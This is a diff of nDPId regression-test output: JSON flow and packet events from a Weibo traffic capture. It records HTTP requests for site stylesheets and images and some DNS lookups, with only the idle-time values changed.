-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8mn5AAEAG+XnAqAFpXbyG9ovdAFDX1pNmAAAAAKACchAuaAAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9tGfim0i3oIcKAS\/\/\/69gAAAgQFqAQCCAoDdgkqAEEJGAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0AXhAAEAGkojAqAFpXbyG9ovbAFCLeghwRn4ptYAQAOUoywAAAQEICgBBCR8Ddgkq"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9zPRoUNfGR1MqAS\/\/+5JgAAAgQFqAQCCAoDdgkrAEEJGAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0fCpAAEAGF9bAqAFpXbyG9ovcAFB8ZHUyz0aFDoAQAOXm+gAAAQEICgBBCR8Ddgkr"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi90SpJVX19aTZ6AS\/\/\/r1QAAAgQFqAQCCAoDdgksAEEJGAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0mn9AAEAG+YDAqAFpXbyG9ovdAFDX1pNnEqSVWIAQAOUZqgAAAQEICgBBCR8Ddgks"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
-00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8AXdAAEAGkoHAqAFpXbyG9ovbAFCLeghvAAAAAKACchAFvgAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8fClAAEAGF8\/AqAFpXbyG9ovcAFB8ZHUxAAAAAKACchCoEAAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8mn5AAEAG+XnAqAFpXbyG9ovdAFDX1pNmAAAAAKACchAuaAAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9tGfim0i3oIcKAS\/\/\/69gAAAgQFqAQCCAoDdgkqAEEJGAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0AXhAAEAGkojAqAFpXbyG9ovbAFCLeghwRn4ptYAQAOUoywAAAQEICgBBCR8Ddgkq"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9zPRoUNfGR1MqAS\/\/+5JgAAAgQFqAQCCAoDdgkrAEEJGAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0fCpAAEAGF9bAqAFpXbyG9ovcAFB8ZHUyz0aFDoAQAOXm+gAAAQEICgBBCR8Ddgkr"} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi90SpJVX19aTZ6AS\/\/\/r1QAAAgQFqAQCCAoDdgksAEEJGAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0mn9AAEAG+YDAqAFpXbyG9ovdAFDX1pNnEqSVWIAQAOUZqgAAAQEICgBBCR8Ddgks"} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1463089072885,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072885,"pkt":"kDVu60UQeJKcD6iOCABFAAA8J\/lAAEARjv3AqAFpwKgBAaGIADUAKAcnK+gBAAABAAAAAAAAAmpzAXQGc2luYWpzAmNuAAABAAE="} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -94,146 +94,146 @@ 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1463089073289,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1463089073289,"pkt":"kDVu60UQeJKcD6iOCABFAAA+KCVAAEARjs\/AqAFpwKgBAYQeADUAKn2XkPcBAAABAAAAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAQ=="} 00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073319,"flow_last_seen":1463089073319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073319,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1463089073319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073319,"pkt":"kDVu60UQeJKcD6iOCABFAAA8H8hAAEAGdDDAqAFpXbyG9oveAFCCZhY7AAAAAKACchAAKAAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073321,"flow_last_seen":1463089073321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073321,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1463089073321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073321,"pkt":"kDVu60UQeJKcD6iOCABFAAA80r9AAEAGwTjAqAFpXbyG9ovfAFBlcdtMAAAAAKACchBYCgAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073322,"flow_last_seen":1463089073322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073322,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1463089073322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073322,"pkt":"kDVu60UQeJKcD6iOCABFAAA8W1BAAEAGOKjAqAFpXbyG9ovgAFAoLVKkAAAAAKACchAd9QAAAgQFtAQCCAoAQQn0AAAAAAEDAwc="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073334,"flow_last_seen":1463089073334,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073334,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1463089073334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073334,"pkt":"kDVu60UQeJKcD6iOCABFAAA8E7RAAEAGgETAqAFpXbyG9ovhAFAJpBpDAAAAAKACchB02wAAAgQFtAQCCAoAQQn3AAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073382,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi944y47WgmYWPKAS\/\/+aeQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073382,"pkt":"kDVu60UQeJKcD6iOCABFAAA0H8lAAEAGdDfAqAFpXbyG9oveAFCCZhY8OMuO14AQAOXIRAAAAQEICgBBCgMDdgyi"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9\/6KbWaZXHbTaAS\/\/8KOQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} 
